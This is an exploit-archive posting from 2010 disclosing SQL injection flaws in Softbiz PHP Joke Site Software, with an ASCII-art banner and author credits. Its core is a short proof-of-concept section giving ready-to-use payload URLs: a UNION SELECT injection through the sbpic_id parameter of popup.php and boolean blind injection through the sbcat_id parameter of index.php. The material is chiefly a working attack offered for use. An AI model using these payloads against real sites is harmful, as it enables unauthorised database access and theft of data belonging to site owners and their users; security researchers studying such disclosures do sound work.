[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Softbiz PHP Joke Site Software Multiple SQL Injection Vulnerabilities
# Published : 2010-12-17
# Author : v3n0m
# Previous Title : Pointter PHP Content Management System Unauthorized Privilege Escalation
# Next Title : Google Urchin 5.7.03 LFI Vulnerability 0day
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( ) )) ) ) )) ) ) ) ( /( ( /(
)())())) ) )()) ) ) ) (()/(()/( ( (()/(()/((()/( )()) )())
((_)((_)(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) ) /(_))(_))/(_))(_)|((_)
__ ((_)((_)/(_))___ ((_) _ ) )___) _ )(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
/ / _ (_)) __ / (_)_(_)(/ __(_)_(_) _ | | __| _ | |_ _|| | | |/ /
V / (_) || (_ | V / / _ | (__ / _ | /| |) | _|| / |__ | | | .` | ' <
|_| ___/ ___| |_| /_/ _ ___/_/ _|_|_|___/|___|_|_____|___||_|_|_|_
.WEB.ID
-----------------------------------------------------------------------
Softbiz PHP Joke Site Software Multiple SQL injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : December, 18-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
Application : PHP Joke Site Software
Price : $29
Vendor : http://www.softbizsolutions.com/
Exploit & p0c
_____________
**[SQLi]
http://site/[path]/popup.php?sbpic_id=[SQLi]
http://site/[path]/popup.php?sbpic_id=-9999+union+all+select+1,2,3,version(),5,6,7,8,9,10,11--
**[Blind SQLi]
http://site/[path]/index.php?sbcat_id=[Blind SQLi]
http://site/[path]/index.php?sbcat_id=6+and+substring(version(),1,1)=5 << true
http://site/[path]/index.php?sbcat_id=6+and+substring(version(),1,1)=4 << false
_______________________________________
All YOGYACARDERLINK CREW & Jovita Andy
_______________________________________